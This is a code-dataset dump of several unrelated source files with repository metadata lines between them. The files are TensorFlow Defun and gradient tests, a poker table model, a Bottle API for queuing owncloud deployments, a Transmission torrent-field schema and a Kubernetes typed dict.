tf.ConfigProto(graph_options=tf.GraphOptions( optimizer_options=tf.OptimizerOptions( opt_level=tf.OptimizerOptions.L1, do_function_inlining=True))) with tf.Session(graph=g, config=cfg) as sess: out, = sess.run(dx, feed) self.assertAllClose(1 - np.square(np.tanh(inp)), out) def testCustomGradient(self): dtype = tf.float32 @function.Defun(dtype, dtype, dtype) def XentLossGrad(logits, labels, dloss): dlogits = tf.reshape(dloss, [-1, 1]) * (tf.nn.softmax(logits) - labels) dlabels = tf.zeros_like(labels) # Takes exp(dlogits) to differentiate it from the "correct" gradient. return tf.exp(dlogits), dlabels @function.Defun(dtype, dtype, grad_func=XentLossGrad) def XentLoss(logits, labels): return tf.reduce_sum(labels * tf.log(tf.nn.softmax(logits)), 1) g = tf.Graph() with g.as_default(): logits = tf.placeholder(dtype) labels = tf.placeholder(dtype) loss = XentLoss(logits, labels) dlogits = tf.gradients([loss], [logits]) x = np.random.uniform(-10., 10., size=(4, 9)).astype(np.float32) prob = np.exp(x) / np.sum(np.exp(x), 1, keepdims=1) y = np.random.uniform(-10., 10., size=(4, 9)).astype(np.float32) for cfg in _OptimizerOptions(): tf.logging.info("cfg = %s", cfg) with tf.Session(graph=g, config=cfg) as sess: out, = sess.run(dlogits, {logits: x, labels: y}) self.assertAllClose(out, np.exp(prob - y)) def testCustomGradientError(self): dtype = tf.float32 @function.Defun(dtype, dtype, dtype) def Grad(x, dy, dz): # Should have returned 1 result. return x, dy + dz @function.Defun(dtype, grad_func=Grad) def Forward(x): return x, x g = tf.Graph() with g.as_default(): inp = tf.placeholder(dtype) out = tf.add_n(Forward(inp)) dinp = tf.gradients(out, [inp]) x = np.random.uniform(-10., 10., size=(4, 9)).astype(np.float32) with tf.Session(graph=g) as sess: with self.assertRaisesRegexp( tf.errors.InvalidArgumentError, "SymGrad expects to return 1.*but get 2.*instead"): _ = sess.run(dinp, {inp: x}) def testSymGradShape(self): g = tf.Graph() with g.as_default(): x = tf.placeholder(tf.float32, [25, 4]) y = tf.placeholder(tf.float32, [200, 100]) dz = tf.placeholder(tf.float32, [1]) # We assume Foo is a function of (x, y) -> (z) Then, Foo's # gradient function is (x, y, dz) -> (dx, dy). dx's shape # should be the same as x's; and dy's shape should be the same # as y's. dx, dy = functional_ops._symbolic_gradient( input=[x, y, dz], Tout=[tf.float32] * 2, f="Foo") self.assertEqual(x.get_shape(), dx.get_shape()) self.assertEqual(y.get_shape(), dy.get_shape()) def testSymGradAttr(self): @function.Defun(noinline=True) def Foo(x): return x * 2 self.assertTrue( Foo.instantiate([tf.float32]).definition.attr["_noinline"].b) g = tf.Graph() with g.as_default(): x = tf.constant(3.0) y = Foo(x) dx, = tf.gradients(y, [x]) cfg = tf.ConfigProto(graph_options=tf.GraphOptions( optimizer_options=tf.OptimizerOptions( opt_level=tf.OptimizerOptions.L0, do_common_subexpression_elimination=True, do_function_inlining=True, do_constant_folding=True))) with self.test_session(graph=g, config=cfg): self.assertAllClose(y.eval(), 6.) self.assertAllClose(dx.eval(), 2.) def testZNoDepOnY(self): @function.Defun(tf.float32, tf.float32) def Foo(x, y): # pylint: disable=unused-argument return x * 2 with tf.Graph().as_default(): # z = Foo(x, y). z doe x = tf.constant(1.0) y = tf.constant(2.0) z = Foo(x, y) dx, dy = tf.gradients([z], [x, y]) with tf.Session() as sess: dx_val, dy_val = sess.run([dx, dy]) self.assertEqual([2.0], dx_val) self.assertEqual([0.0], dy_val) def testDefineFunctionNoArgs(self): @function.Defun(func_name="AConstant") def AConstant(): return tf.constant([42]) with tf.Graph().as_default(): call = AConstant() self.assertEqual("AConstant", call.op.name) with tf.Session() as sess: self.assertAllEqual([42], sess.run(call)) def testDefineFunctionNames(self): @function.Defun(tf.float32, func_name="Foo") def Foo(a): return a + 1 with tf.Graph().as_default(): call1 = Foo([1.0]) self.assertEqual("Foo", call1.op.name) call2 = Foo([1.0]) self.assertEqual("Foo_1", call2.op.name) # pylint: disable=unexpected-keyword-arg call3 = Foo([1.0], name="mine") self.assertEqual("mine", call3.op.name) with tf.name_scope("my"): call4 = Foo([1.0], name="precious") self.assertEqual("my/precious", call4.op.name) def testNoOp(self): @function.Defun(tf.float32) def Foo(x): y = tf.Print(x, [x], "Hello") with tf.control_dependencies([y]): z = tf.no_op() with tf.control_dependencies([z]): return x * 2 with tf.Graph().as_default(), self.test_session(): z = Foo(tf.constant(3.0)) self.assertAllEqual(z.eval(), 6.0) def testAssertOp(self): @function.Defun(tf.float32) def Foo(x): check = gen_logging_ops._assert(tf.greater(x, 0), [x]) with tf.control_dependencies([check]): return x * 2 g = tf.Graph() with g.as_default(), self.test_session(): self.assertAllEqual(Foo(tf.constant(3.0)).eval(), 6.0) with self.assertRaisesRegexp(tf.errors.InvalidArgumentError, "assertion failed.*-3"): self.assertAllEqual(Foo(tf.constant(-3.0)).eval(), 6.0) def testAssertWrapper(self): @function.Defun(tf.float32) def MyFn(x): with tf.control_dependencies([tf.Assert(tf.less_equal(x, 10.0), [x])]): return tf.identity(x) with self.test_session(): self.assertEqual(1.0, MyFn(1.0).eval()) with self.assertRaisesRegexp(tf.errors.InvalidArgumentError, "assertion"): _ = MyFn(100.0).eval() def testVar(self): @function.Defun(tf.float32) def Foo(x): return x * x + 1 g = tf.Graph() with g.as_default(): v = tf.Variable(tf.constant(10.0)) z = Foo(v) with self.test_session(graph=g): tf.global_variables_initializer().run() self.assertAllEqual(z.eval(), 101.) def testDefineErrors(self): with tf.Graph().as_default(): with self.assertRaisesRegexp(ValueError, "can not return None"): @function.Defun() def NoResult(): pass _ = NoResult.definition with self.assertRaisesRegexp(ValueError, "can not return None"): @function.Defun() def TwoNone(): return None, None _ = TwoNone.definition with self.assertRaisesRegexp(ValueError, "are not supported"): @function.Defun() def DefaultArg(unused_a=12): return tf.constant([1]) _ = DefaultArg.definition with self.assertRaisesRegexp(ValueError, "are not supported"): @function.Defun() def KwArgs(**unused_kwargs): return tf.constant([1]) _ = KwArgs.definition with self.assertRaisesRegexp(ValueError, "specified input types"): @function.Defun(tf.float32) def PlusMinusV2(a, b): return a + b, b - a _ = PlusMinusV2.definition with self.assertRaisesRegexp(ValueError, "specified input types"): @function.Defun(tf.float32, tf.float32, tf.float32) def PlusMinusV3(a, b): return a + b, b - a _ = PlusMinusV3.definition def testCallErrors(self): @function.Defun() def Const(): return tf.constant(1) @function.Defun(tf.int32) def PlusOne(a): return a + 1 @function.Defun(tf.int32, tf.int32) def PlusMinus(a, b): return a + b, b - a with tf.Graph().as_default(): _ = Const() # pylint: disable=too-many-function-args # pylint: disable=unexpected-keyword-arg # pylint: disable=no-value-for-parameter with self.assertRaisesRegexp(ValueError, "arguments: 0"): _ = Const(1) with self.assertRaisesRegexp(ValueError, "arguments: 0"): _ = Const(1, 2) with self.assertRaisesRegexp(ValueError, "arguments: 1"): _ = PlusOne() _ = PlusOne(1) with self.assertRaisesRegexp(ValueError, "arguments: 1"): _ = PlusOne(1, 2) with self.assertRaisesRegexp(ValueError, "arguments: 2"): _ = PlusMinus() with self.assertRaisesRegexp(ValueError, "arguments: 2"): _ = PlusMinus(1) _ = PlusMinus(1, 2) _ = PlusOne(1, name="p1") with self.assertRaisesRegexp(ValueError, "Unknown keyword arguments"): _ = PlusOne(1, device="/gpu:0") def testFunctionDecorator(self): @function.Defun(tf.float32, func_name="Minus1") def Minus1(b): return b - 1.0 with tf.Graph().as_default(): call1 = Minus1([2.]) self.assertTrue(isinstance(Minus1, function._DefinedFunction)) self.assertEqual(Minus1.name, "Minus1") # pylint: disable=unexpected-keyword-arg call2 = Minus1(call1, name="next") # pylint: enable=unexpected-keyword-arg self.assertEqual("next", call2.op.name) with tf.Session() as sess: self.assertAllEqual([1], sess.run(call1)) self.assertAllEqual([0], sess.run(call2)) def testNestedFunction(self): @function.Defun(tf.float32) def Cube(x): return x * x * x @function.Defun(tf.float32, tf.float32) def CubeXPlusY(x, y): return Cube(x) + y with tf.Graph().as_default(): z = CubeXPlusY(3.0, -2.0) with self.test_session(): self.assertAllEqual(z.eval(), 25.0) def testNestedDefinedFunction(self): @function.Defun(tf.float32, tf.float32) def CubeXPlusY(x, y): @function.Defun(tf.float32) def Cube(x): return x * x * x return Cube(x) + y with tf.Graph().as_default(): z = CubeXPlusY(3.0, -2.0) with self.test_session(): self.assertAllEqual(z.eval(), 25.0) def testUnusedFunction(self): invoked = False # pylint: disable=unused-variable @function.Defun() def Unused(): invoked = True return tf.constant(42.) self.assertFalse(invoked) g = tf.Graph() with g.as_default(): @function.Defun() def Unused2(): invoked = True return tf.constant(7.) tf.constant(3.) # pylint: enable=unused-variable self.assertFalse(invoked) gdef = g.as_graph_def() self.assertEqual(0, len(gdef.library.function)) def testReduction(self): g = tf.Graph() # BN0 is computing batch normed matrix along rows. def BN0(x): mean = tf.reduce_mean(x, [0]) var = tf.reduce_mean(tf.square(x - mean)) # biased var rstd = tf.rsqrt(var + 1e-8) return (x - mean) * rstd # Wraps BatchNorm in a tf function. @function.Defun(tf.float32) def BN1(x): return BN0(x) with g.as_default(): x = tf.placeholder(tf.float32) y0 = BN0(x) # A plain graph y1 = BN1(x) # A tf function dx0, = tf.gradients([y0], [x]) dx1, = tf.gradients([y1], [x]) # Both should produce the same result and gradient. with self.test_session(graph=g) as sess: vals = sess.run([y0, y1, dx0, dx1], {x: np.random.uniform(size=(3, 7))}) self.assertAllClose(vals[0], vals[1]) self.assertAllClose(vals[2], vals[3]) def testDeclareTypeMistake(self): foo = function.Declare("Foo", [tf.float32], [tf.float32]) @function.Defun(tf.float32, func_name="Foo") def Foo(x): return x * x + 1 g = tf.Graph() with g.as_default(): y = foo(2.0) with self.test_session(graph=g): with self.assertRaisesRegexp(tf.errors.NotFoundError, "not registered"): _ = y.eval() g = tf.Graph() with g.as_default(): Foo.add_to_graph(g) y = foo(2) with self.test_session(graph=g): with self.assertRaisesRegexp(tf.errors.InvalidArgumentError, "int32.*float"): _ = y.eval() g = tf.Graph() with g.as_default(): Foo.add_to_graph(g) with self.assertRaisesRegexp( ValueError, "Expected number of arguments: 1, received: 2"): _ = foo(2.0, 2.0) g = tf.Graph() with g.as_default(): Foo.add_to_graph(g) y = foo(2.0) with self.test_session(graph=g): self.assertAllEqual(y.eval(), 5.0) def testCapture(self): g = tf.Graph() with g.as_default(): w = tf.Variable(tf.constant([[1.0]])) b = tf.Variable(tf.constant([2.0])) # Foo() captures w and b. @function.Defun(tf.float32) def Foo(x): # Plus() captures b. @function.Defun(tf.float32) def Plus(y): return y + b return Plus(tf.matmul(w, x)) y = Foo(tf.constant([[10.]])) with self.test_session(graph=g): tf.global_variables_initializer().run() self.assertAllEqual(y.eval(), [[12.0]]) def testCaptureControls(self): g = tf.Graph() with g.as_default(): x = tf.constant([10.0]) x = tf.Print(x, [x], "outer") @function.Defun(tf.float32) def Foo(y): with tf.control_dependencies([x]): y = tf.Print(y, [y], "inner") return y with self.assertRaisesRegexp(ValueError, "not an element of this graph."): # NOTE: We still do not support capturing control deps. _ = Foo(x) def testStableName(self): @function.Defun() def Foo(x, y, z): return tf.tanh(tf.matmul(x, y) + z) self.assertEqual("Foo_158cce4d", Foo.instantiate([tf.float32] * 3).name) class FunctionOverloadTest(tf.test.TestCase): def testBasic(self): @function.Defun() def Sinh(x): return 1 / 2. * (tf.exp(x) - tf.exp(-x)) g = tf.Graph() with g.as_default(): x = Sinh(tf.constant(0.25, tf.float32)) y = Sinh(tf.constant(0.25, tf.float64)) with self.test_session(graph=g): self.assertAllClose(x.eval(), np.sinh(0.25)) self.assertAllClose(y.eval(), np.sinh(0.25)) def testGradient(self): @function.Defun(func_name="Spec") def G(x, dy): return x * dy @function.Defun(grad_func=G) def F(x): return tf.exp(x) - tf.exp(-x) for dtype in [tf.float32, tf.float64]: g = tf.Graph() with g.as_default(): x = tf.constant(0.25, dtype) y = F(x) dx, = tf.gradients(y, x) with self.test_session(graph=g): self.assertAllClose(dx.eval(), 0.25) def testDocString(self): @function.Defun() def Foo(x): """Successor of x.""" return x + 1 g = tf.Graph() with g.as_default(): _ = Foo(1) self.assertEqual(g.as_graph_def().library.function[0].signature.description, "Successor of x.") class UnrollLSTMTest(tf.test.TestCase): BATCH_SIZE = 16 LSTM_DIMS = 32 NUM_UNROLL = 20 def _Weights(self): dims = self.LSTM_DIMS return tf.random_uniform([2 * dims, 4 * dims], -1, 1, seed=123456) def _Input(self): return tf.random_uniform( [self.NUM_UNROLL, self.BATCH_SIZE, self.LSTM_DIMS], seed=654321) # Helper to construct a LSTM cell graph. @classmethod def LSTMCell(cls, x, mprev, cprev, weights): xm = tf.concat(1, [x, mprev]) i_i, i_g, f_g, o_g = tf.split(1, 4, tf.matmul(xm, weights)) new_c = tf.sigmoid(f_g) * cprev + tf.sigmoid(i_g) * tf.tanh(i_i) new_c = tf.clip_by_value(new_c, -50.0, 50.0) new_m = tf.sigmoid(o_g) * tf.tanh(new_c) return new_m, new_c def _BuildForward(self, weights, inp, mode="cell"): def Loop(cell, w, i): x = tf.unstack(i, self.NUM_UNROLL) m = tf.zeros_like(x[0]) c = tf.zeros_like(x[0]) for i in range(self.NUM_UNROLL): m, c = cell(x[i], m, c, w) return m cell = UnrollLSTMTest.LSTMCell if mode == "complete": # Constructs the complete graph in python. return Loop(cell, weights, inp) cell = function.Defun(tf.float32, tf.float32, tf.float32, tf.float32)(cell) if mode == "cell": # Just represent the LSTM as a function. return Loop(cell, weights, inp) if mode == "loop": # Wraps the whole loop as a function. @function.Defun(tf.float32, tf.float32) def LSTMLoop(w, i): return Loop(cell, w, i) return LSTMLoop(weights, inp) if mode == "loop10": # Wraps 10 lstm steps into one function, and the whole loop # into another calling the formers. # Groups 10 steps at a time. @function.Defun(tf.float32, tf.float32, tf.float32, *([tf.float32] * 10)) def Loop10(w, m, c, *args): for x in args: m, c = cell(x, m, c, w) return m, c @function.Defun(tf.float32, tf.float32) def LSTMLoop10(weights, inp): x = tf.unstack(inp, self.NUM_UNROLL) m = tf.zeros_like(x[0]) c = tf.zeros_like(x[0]) assert self.NUM_UNROLL % 10 == 0 for i in range(0, self.NUM_UNROLL, 10): m, c = Loop10(weights, m, c, *x[i:i + 10]) return m return LSTMLoop10(weights, inp) def testUnrollLSTM(self): # Run one step of the unrolled lstm graph. def RunForward(mode, cfg=None): tf.logging.info("mode = %s", mode) g = tf.Graph() start = time.time() with g.as_default(): weights = self._Weights() inp = self._Input() m = self._BuildForward(weights, inp, mode) gdef = g.as_graph_def() finish = time.time() tf.logging.info("time: %f txt size: %d gdef bin size: %d", finish - start, len(str(gdef)), len(gdef.SerializeToString())) with g.as_default(), tf.Session(config=cfg) as sess: return sess.run(m) mv0 = RunForward("complete") for cfg in _OptimizerOptions(): tf.logging.info("cfg = %s", cfg) mv1 = RunForward("cell", cfg) mv2 = RunForward("loop", cfg) mv3 = RunForward("loop10", cfg) self.assertAllClose(mv0, mv1, rtol=1e-4) self.assertAllClose(mv0, mv2, rtol=1e-4) self.assertAllClose(mv0, mv3, rtol=1e-4) def testUnrollLSTMGrad(self): # Run one step of the unrolled lstm graph. def RunForwardBackward(mode, cfg=None): tf.logging.info("mode = %s", mode) g = tf.Graph() start = time.time() with g.as_default(): weights = self._Weights() inp = self._Input() m = self._BuildForward(weights, inp, mode) loss = tf.reduce_sum(tf.square(m)) dw = tf.gradients([loss], [weights]) gdef = g.as_graph_def() finish = time.time() tf.logging.info("time: %f txt size: %d gdef bin size: %d", finish - start, len(str(gdef)), len(gdef.SerializeToString())) with g.as_default(), tf.Session(config=cfg) as sess: return sess.run(dw) d0 = RunForwardBackward("complete") for cfg in _OptimizerOptions(): tf.logging.info("cfg = %s", cfg) d1 = RunForwardBackward("cell", cfg) d2 = RunForwardBackward("loop", cfg) d3 = RunForwardBackward("loop10", cfg) self.assertAllClose(d0, d1, rtol=1e-4) self.assertAllClose(d0, d2, rtol=1e-4) self.assertAllClose(d0, d3, rtol=1e-4) class FunctionInlineControlTest(tf.test.TestCase): def testFoo(self): dtype = tf.float32 cfg = tf.ConfigProto(graph_options=tf.GraphOptions( optimizer_options=tf.OptimizerOptions( opt_level=tf.OptimizerOptions.L0, do_common_subexpression_elimination=True, do_function_inlining=True, do_constant_folding=True))) for noinline in [False, True]: @function.Defun(dtype, noinline=noinline) def Cell(v): # If v is a vector [n, 1], x is a big square matrix. x = tf.tanh(v + tf.transpose(v, [1, 0])) return tf.reduce_sum(x, 1, keep_dims=True) @function.Defun(dtype) def Forward(x): for _ in range(10): # pylint: disable=cell-var-from-loop x = Cell(x) return tf.reduce_sum(x, [0, 1]) self.assertEqual(noinline, Cell.definition.attr["_noinline"].b) g = tf.Graph() with g.as_default(): x = tf.placeholder(dtype) y = Forward(x) dx, = tf.gradients([y], [x]) np.random.seed(321) inp = np.random.uniform(-1, 1, [16, 1]).astype(np.float32) run_metadata = tf.RunMetadata() with tf.Session(graph=g, config=cfg) as sess: ans = sess.run( [y, dx], {x: inp}, run_metadata=run_metadata, options=tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)) print(ans[0], np.sum(ans[1])) self.assertAllClose(ans[0], 255.971, rtol=1e-3) self.assertAllClose(np.sum(ans[1]), 13.0408, rtol=1e-3) def MetadataHasCell(run_metadata): for dev_stats in run_metadata.step_stats.dev_stats: for node_stats in dev_stats.node_stats: if "Cell" in node_stats.timeline_label: return True return False self.assertEqual(MetadataHasCell(run_metadata), noinline) @function.Defun(*[tf.float32] * 3) def Linear(w, b, x): return tf.nn.relu(tf.matmul(x, w) + b) @function.Defun(*[tf.float32] * 5) def Linear2(w1, b1, w2, b2, x): return Linear(w2, b2, Linear(w1, b1, x)) class ModuleFunctionTest(tf.test.TestCase): def testBasic(self): with tf.Graph().as_default(): a, b, c, d, e = [tf.constant([[_]], dtype=tf.float32) for _ in range(5)] y = Linear(a, b, c) z = Linear2(a, b, c, d, e) with tf.Session() as sess: self.assertAllEqual([[1]], sess.run(y)) self.assertAllEqual([[5]], sess.run(z)) class VariableHoistingTest(tf.test.TestCase): def _testSimpleModel(self, use_forward_func): def _Model(x): w = tf.get_variable( "w", (64, 64), initializer=tf.random_uniform_initializer(seed=312)) b = tf.get_variable("b", (64), initializer=tf.zeros_initializer), return tf.sigmoid(tf.matmul(x, w) + b) @function.Defun() def Model(x): return _Model(x) cvars = [] @function.Defun() def Grad(x, y0): if use_forward_func: y = Model(x) else: y = _Model(x) loss = tf.reduce_mean(tf.reduce_sum(y0 * tf.log(y), 1), 0) arg_w, arg_b = function.get_extra_args() self.assertEqual(arg_w.get_shape(), tf.TensorShape([64, 64])) self.assertEqual(arg_b.get_shape(), tf.TensorShape([64])) dw, db = tf.gradients(loss, [arg_w, arg_b]) cvars.extend(function.get_extra_vars()) return loss, dw, db g = tf.Graph() with g.as_default(): x = tf.random_normal([64, 64], seed=100) y0 = tf.random_normal([64, 64], seed=200) with tf.variable_scope("Foo"): loss, dw, db = Grad(x, y0) self.assertEqual(2, len(cvars)) w, b = cvars[:2] self.assertEqual("Foo/w", w.op.name) self.assertEqual("Foo/b", b.op.name) with self.test_session(graph=g) as sess: sess.run(tf.global_variables_initializer()) w, b, x, y0, loss, dw, db = sess.run([w, b, x, y0, loss, dw, db]) self.assertAllEqual(w.shape, (64, 64)) self.assertAllClose(np.sum(w), 2050.44) self.assertAllEqual(b.shape, (64,)) self.assertAllClose(np.sum(b), 0.0) self.assertAllClose(loss, -2.27, rtol=1e-2) self.assertAllEqual(dw.shape, (64, 64)) self.assertAllClose(np.sum(dw), -1.04, rtol=1e-2) self.assertAllEqual(db.shape, (64,)) self.assertAllClose(np.sum(db), 0.509, rtol=1e-2) def testBasic(self): self._testSimpleModel(True) self._testSimpleModel(False) if __name__ == "__main__": tf.test.main()
29.928492
80
0.608004
178ed631f162a62ed2fc2c01c6e309f4d014545b
3,019
py
Python
backend/src/dealer/model/table.py
codepals-org/poker
8b58df2ff4d3d9799c42652a9d6942d8ec6b3707
[ "MIT" ]
2
2020-11-07T16:37:14.000Z
2020-11-07T17:11:24.000Z
backend/src/dealer/model/table.py
codepals-org/poker
8b58df2ff4d3d9799c42652a9d6942d8ec6b3707
[ "MIT" ]
7
2020-11-07T14:04:06.000Z
2020-11-11T11:49:13.000Z
backend/src/dealer/model/table.py
codepals-org/poker
8b58df2ff4d3d9799c42652a9d6942d8ec6b3707
[ "MIT" ]
1
2020-11-08T13:00:27.000Z
2020-11-08T13:00:27.000Z
from .player import Player, PlayerList from typing import List from enum import Enum, auto import random from typing import List import logging CARDS = [ # Card Abbreviations: # https://commons.wikimedia.org/wiki/Category:SVG_playing_cards "2H","3H","4H","5H","6H","7H","8H","9H","10H","JH","QH","KH","AH", "2D","3D","4D","5D","6D","7D","8D","9D","10D","JD","QD","KD","AD", "2S","3S","4S","5S","6S","7S","8S","9S","10S","JS","QS","KS","AS", "2C","3C","4C","5C","6C","7C","8C","9C","10C","JC","QC","KC","AC" ] class Phase(Enum): REGISTRATION = auto() # Game has not started. Player able to take a seat. PREFLOP = auto() FLOP = auto() TURN = auto() RIVER = auto() SHOWDOWN = auto() class Table(): """ A Poker Table is where players can participate in a Poker Game """ def __init__(self, cash_per_player : float = 500, small_blind :float = 10, big_blind :float = 20, max_players :int = 8): if max_players > 22: raise ValueError("Maximum for a Poker Game is is 22 players.") if max_players < 2: raise ValueError("Minimum for a Poker Game is 2 players.") self.cash_per_player :float = float(cash_per_player) self.small_blind :float = float(small_blind) self.big_blind :float = float(big_blind) self.max_players :int = int(max_players) self.phase :Phase = Phase.REGISTRATION self.card_stack :List[str] = CARDS random.shuffle(self.card_stack) self.players = PlayerList(table=self) self.community_cards :List[str] = [] def json(self): return { "id" : id(self), "cash_per_player": self.cash_per_player, "small_blind" : self.small_blind, "big_blind" : self.big_blind, "phase": self.phase } def signup(self, player :Player): """ A player sits down at the table and gets the start budget""" if self.phase != Phase.REGISTRATION: raise RuntimeError("Game already started. No signups anymore.") if len(self.players) >= self.max_players: raise RuntimeError("Max players reached. No signups anymore.") else: self.players.append(player) player.money_seat = self.cash_per_player def start_game(self): """ Start the game, hand out money to each player """ if self.phase != Phase.REGISTRATION: raise RuntimeError("Game already started.") if len(self.players) < 2: raise RuntimeError("Not enough players to start the game.") self.players.init_buttons() self.players.deduct_blinds() logging.warning(self.card_stack) self.players.handout_cards(self.card_stack) self.phase = Phase.PREFLOP self.start_preflop() def start_preflop(self): self.players.who_starts().active = True def call(self): self.players.need_to_pay()
35.104651
77
0.596555
336689372db2a2331924ca3fa154281a420cffb5
3,995
py
Python
jumpscale/packages/owncloud/bottle/api.py
threefoldtech/owncloud_deployer
d652d54a35d7a964f5f1b50ffbec0855ffd6f02f
[ "Apache-2.0" ]
null
null
null
jumpscale/packages/owncloud/bottle/api.py
threefoldtech/owncloud_deployer
d652d54a35d7a964f5f1b50ffbec0855ffd6f02f
[ "Apache-2.0" ]
null
null
null
jumpscale/packages/owncloud/bottle/api.py
threefoldtech/owncloud_deployer
d652d54a35d7a964f5f1b50ffbec0855ffd6f02f
[ "Apache-2.0" ]
null
null
null
import csv from jumpscale.loader import j from jumpscale.packages.auth.bottle.auth import admin_only, get_user_info, login_required from jumpscale.packages.owncloud.models.users import UserStatus from jumpscale.packages.owncloud.models import deployment_model from bottle import Bottle, request, HTTPResponse, static_file app = Bottle() templates_path = j.sals.fs.join_paths(j.sals.fs.dirname(__file__), "templates") env = j.tools.jinja2.get_env(templates_path) DEPLOYMENT_QUEUE = "DEPLOYMENT_QUEUE" @app.route("/api/requests", method=["GET"]) @login_required @admin_only def list_users(): """List all users for admin """ users = [] for user_name in deployment_model.list_all(): user = deployment_model.get(user_name) users.append(user.to_dict()) return HTTPResponse( j.data.serializers.json.dumps(users), status=200, headers={"Content-Type": "application/json"}, ) @app.route("/api/requests", method=["POST"]) @login_required def create_user(): """Create new instance for user if new - return 409 if user has registered before """ user_info = j.data.serializers.json.loads(get_user_info()) username = j.data.text.removesuffix(user_info.get("username"), ".3bot") data = j.data.serializers.json.loads(request.body.read()) email = data.get("email") if email == "": email = user_info.get("email") if username in deployment_model.list_all(): return HTTPResponse( f"user {username} has already submitted a request. please be patient while we prepare your deployment", status=409, headers={"Content-Type": "application/json"}, ) user = deployment_model.get(username) user.tname = username user.email = email user.status = UserStatus.NEW user.time = j.data.time.utcnow().timestamp user.save() return HTTPResponse( f"Your request will be processed soon. You'll receive your deployment information at {user.email}", status=201, headers={"Content-Type": "application/json"}, ) @app.route("/api/deployment", method=["POST"]) @login_required @admin_only def deploy_instances(): """get json file for approved users and generate terraform files for them """ users = j.data.serializers.json.loads(request.body.read()) for username in users: user = deployment_model.get(username) if user.status in [UserStatus.APPLY_FAILURE, UserStatus.NEW]: user.status = UserStatus.PENDING user.save() j.core.db.rpush(DEPLOYMENT_QUEUE, j.data.serializers.json.dumps(username)) return HTTPResponse( {"success": True}, status=200, headers={"Content-Type": "application/json"}, ) @app.route("/api/balance", method=["GET"]) @login_required @admin_only def get_balance(): """get the main wallet current balance """ balance = j.tools.http.get("http://localhost:3001/balance").json() return HTTPResponse( balance, status=200, headers={"Content-Type": "application/json"}, ) @app.route("/api/requests/export") @login_required @admin_only def export(): """Export saved users as csv """ users = [] for user_name in deployment_model.list_all(): order = deployment_model.get(user_name) users.append(order.to_dict()) if not users: return {"Error": "File not found"} path = j.sals.fs.join_paths(j.core.dirs.BASEDIR, "exports") j.sals.fs.mkdirs(path) time_now = j.data.time.utcnow().strftime("%Y_%m_%d_%H_%M_%S") filename = f"export_{time_now}.csv" filepath = j.sals.fs.join_paths(path, filename) keys = list(users[0].keys()) with open(filepath, "w", newline="") as csvfile: writer = csv.writer(csvfile) writer.writerow(keys) for user in users: writer.writerow(user[k] for k in keys) return static_file(filename, root=path, download=filename)
30.730769
115
0.665081
67f36500657d7757009a2cbcee518899f03906bf
2,440
py
Python
clutch/schema/request/torrent/accessor.py
ExeArco/clutch
223244b1294b496ba16c8a2433eb453cce593a62
[ "MIT" ]
34
2018-04-14T12:53:07.000Z
2021-08-21T12:52:23.000Z
clutch/schema/request/torrent/accessor.py
ExeArco/clutch
223244b1294b496ba16c8a2433eb453cce593a62
[ "MIT" ]
18
2018-04-30T20:32:44.000Z
2021-10-03T15:24:33.000Z
clutch/schema/request/torrent/accessor.py
ExeArco/clutch
223244b1294b496ba16c8a2433eb453cce593a62
[ "MIT" ]
10
2019-01-31T20:21:13.000Z
2021-10-03T10:01:26.000Z
from typing import Optional, Set from pydantic import BaseModel, Field, validator from clutch.compat import Literal from clutch.network.rpc.convert import to_hyphen, to_camel from clutch.schema.user.method.shared import IdsArg AccessorFieldRequest = Literal[ "activityDate", "addedDate", "bandwidthPriority", "comment", "corruptEver", "creator", "dateCreated", "desiredAvailable", "doneDate", "downloadDir", "downloadedEver", "downloadLimit", "downloadLimited", "editDate", "error", "errorString", "eta", "etaIdle", "files", "fileStats", "hashString", "haveUnchecked", "haveValid", "honorsSessionLimits", "id", "isFinished", "isPrivate", "isStalled", "labels", "leftUntilDone", "magnetLink", "manualAnnounceTime", "maxConnectedPeers", "metadataPercentComplete", "name", "peer-limit", "peers", "peersConnected", "peersFrom", "peersGettingFromUs", "peersSendingToUs", "percentDone", "pieces", "pieceCount", "pieceSize", "priorities", "queuePosition", "rateDownload", "rateUpload", "recheckProgress", "secondsDownloading", "secondsSeeding", "seedIdleLimit", "seedIdleMode", "seedRatioLimit", "seedRatioMode", "sizeWhenDone", "startDate", "status", "trackers", "trackerStats", "totalSize", "torrentFile", "uploadedEver", "uploadLimit", "uploadLimited", "uploadRatio", "wanted", "webseeds", "webseedsSendingToUs", ] TorrentAccessorFieldsRequest = Set[AccessorFieldRequest] class TorrentAccessorArgumentsRequest(BaseModel): ids: Optional[IdsArg] format: Optional[Literal["objects", "table"]] accessor_fields: TorrentAccessorFieldsRequest = Field( ..., alias="fields" ) # this must be an alias for pydantic reasons @validator("accessor_fields", pre=True) def accessor_fields_format(cls, v): if v is not None: hyphenated = ["peer_limit"] result = [] try: for field in v: if field in hyphenated: result.append(to_hyphen(field)) else: result.append(to_camel(field)) except TypeError: return v return result else: return v
22.592593
58
0.597541
3e867f80d5a19232b064a8d79017691007f5df65
469
py
Python
kubernetes_typed/client/models/apiextensions_v1beta1_webhook_client_config.py
sobolevn/kubernetes-typed
5f0a770631c73a9831fbeaeebac188e8f4a52c54
[ "Apache-2.0" ]
22
2020-12-10T13:06:02.000Z
2022-02-13T21:58:15.000Z
kubernetes_typed/client/models/apiextensions_v1beta1_webhook_client_config.py
sobolevn/kubernetes-typed
5f0a770631c73a9831fbeaeebac188e8f4a52c54
[ "Apache-2.0" ]
4
2021-03-08T07:06:12.000Z
2022-03-29T23:41:45.000Z
kubernetes_typed/client/models/apiextensions_v1beta1_webhook_client_config.py
sobolevn/kubernetes-typed
5f0a770631c73a9831fbeaeebac188e8f4a52c54
[ "Apache-2.0" ]
2
2021-09-05T19:18:28.000Z
2022-03-14T02:56:17.000Z
# Code generated by `typeddictgen`. DO NOT EDIT. """ApiextensionsV1beta1WebhookClientConfigDict generated type.""" from typing import TypedDict from kubernetes_typed.client import ApiextensionsV1beta1ServiceReferenceDict ApiextensionsV1beta1WebhookClientConfigDict = TypedDict( "ApiextensionsV1beta1WebhookClientConfigDict", { "caBundle": str, "service": ApiextensionsV1beta1ServiceReferenceDict, "url": str, }, total=False, )
29.3125
76
0.763326
18aba273aabf87a58d4f4ee22cc8231a59082c8e
9,199
py
Python
tensorflow_graphics/geometry/representation/mesh/normals.py
drebain/graphics
c84b7599d1f8a55ccbdd589c1a845494c17c2784
[ "Apache-2.0" ]
1
2021-03-10T15:15:43.000Z
2021-03-10T15:15:43.000Z
tensorflow_graphics/geometry/representation/mesh/normals.py
drebain/graphics
